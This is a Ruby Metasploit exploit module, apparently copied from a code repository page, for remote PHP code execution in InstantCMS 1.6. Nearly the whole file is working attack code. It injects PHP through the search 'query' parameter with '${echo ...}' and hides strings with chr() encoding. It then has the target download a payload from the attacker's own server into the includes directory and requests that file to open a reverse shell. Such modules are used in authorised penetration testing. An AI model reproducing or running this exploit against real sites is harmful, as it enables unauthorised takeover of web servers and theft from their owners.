127 lines
3.4 KiB
Ruby
Executable File
127 lines
3.4 KiB
Ruby
Executable File
require 'msf/core'
|
|
|
|
|
|
class Metasploit3 < Msf::Exploit::Remote
|
|
|
|
include Msf::Exploit::Remote::HttpClient
|
|
include Msf::Exploit::Remote::HttpServer
|
|
|
|
def initialize(info = {})
|
|
super(update_info(info,
|
|
'Name' => 'InstantCMS 1.6 Remote PHP Code Execution',
|
|
'Description' => %q{ This module exploits an arbitrary command execution vulnerability in the InstantCMS versions 1.6 },
|
|
'Author' => [ 'Ricardo Jorge Borges de Almeida <ricardojba1[at]gmail.com>' # Metasploit module
|
|
],
|
|
'License' => MSF_LICENSE,
|
|
'References' =>
|
|
[
|
|
['URL', 'http://packetstormsecurity.com/files/122176/InstantCMS-1.6-Code-Execution.html'],
|
|
],
|
|
'Privileged' => false,
|
|
'Platform' => ['php'],
|
|
'Arch' => ARCH_PHP,
|
|
'Targets' => [[ 'Automatic', { }]],
|
|
'DisclosureDate' => 'Jun 26 2013',
|
|
'DefaultTarget' => 0))
|
|
|
|
register_options(
|
|
[
|
|
OptString.new('TARGETURI', [true, "The URI path of the InstantCMS page", "/"]),
|
|
], self.class)
|
|
end
|
|
|
|
def check
|
|
res = send_request_cgi({
|
|
'uri' => normalize_uri(datastore['URI']),
|
|
'vars_get' =>
|
|
{
|
|
'view' => 'search',
|
|
'query' => '${echo phpinfo()}'
|
|
}
|
|
})
|
|
|
|
if res
|
|
if res.body.match(/Build Date/)
|
|
return Exploit::CheckCode::Vulnerable
|
|
else
|
|
return Exploit::CheckCode::Safe
|
|
end
|
|
else
|
|
return Exploit::CheckCode::Unknown
|
|
end
|
|
|
|
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
|
|
end
|
|
|
|
def on_request_uri(cli, request)
|
|
#print_status("on_request_uri called: #{request.inspect}")
|
|
send_response(cli, payload.encoded)
|
|
end
|
|
|
|
def exploit
|
|
|
|
return if not check == Exploit::CheckCode::Vulnerable
|
|
|
|
begin
|
|
fname = Rex::Text.rand_text_alpha(3) + ".php"
|
|
resource_uri = '/' + Rex::Text.rand_text_alpha(3)
|
|
|
|
sploit_uri = "http://#{datastore['SRVHOST']}:#{datastore['SRVPORT']}#{resource_uri}"
|
|
|
|
sploit_fname = fname.unpack('C*').map! { |ch| ch = "chr(#{ch})" }.join('.')
|
|
shell_uri = sploit_uri.unpack('C*').map! { |ch| ch = "chr(#{ch})" }.join('.')
|
|
|
|
exec = payload.encoded.unpack('C*').map! { |ch| ch = "chr(#{ch})" }.join('.')
|
|
|
|
start_service({
|
|
'Uri' => {
|
|
'Proc' => Proc.new { |cli, req| on_request_uri(cli, req)
|
|
},
|
|
'Path' => resource_uri }})
|
|
|
|
print_status("Creating the shell on http://#{rhost}:#{rport}/includes/#{fname}")
|
|
|
|
res = send_request_cgi({
|
|
'uri' => normalize_uri(datastore['URI']),
|
|
'vars_get' =>
|
|
{
|
|
'view' => 'search',
|
|
'query' => '${echo file_put_contents(chr(105).chr(110).chr(99).chr(108).chr(117).chr(100).chr(101).chr(115).chr(47).'+sploit_fname+',file_get_contents('+shell_uri+'))}'
|
|
}
|
|
})
|
|
|
|
if res
|
|
if res.code == 200
|
|
print_status("Shell created successfully.")
|
|
else
|
|
fail_with(Exploit::Failure::Unknown, "The server returned: #{res.code} #{res.message} - Failed to upload the shell.")
|
|
stop_service
|
|
end
|
|
else
|
|
fail_with(Exploit::Failure::Unknown, 'No response from the server.')
|
|
stop_service
|
|
end
|
|
|
|
res = send_request_raw({
|
|
'uri' => normalize_uri(datastore['URI'], "includes", fname),
|
|
})
|
|
|
|
if res
|
|
if res.code == 200
|
|
print_status("Requesting the shell.")
|
|
else
|
|
fail_with(Exploit::Failure::Unknown, "The server returned: #{res.code} #{res.message} - Failed to request the reverse shell.")
|
|
stop_service
|
|
end
|
|
else
|
|
fail_with(Exploit::Failure::Unknown, 'No response from the server.')
|
|
stop_service
|
|
end
|
|
|
|
stop_service
|
|
|
|
rescue Exploit::CheckCode::Unknown
|
|
end
|
|
end
|
|
end
|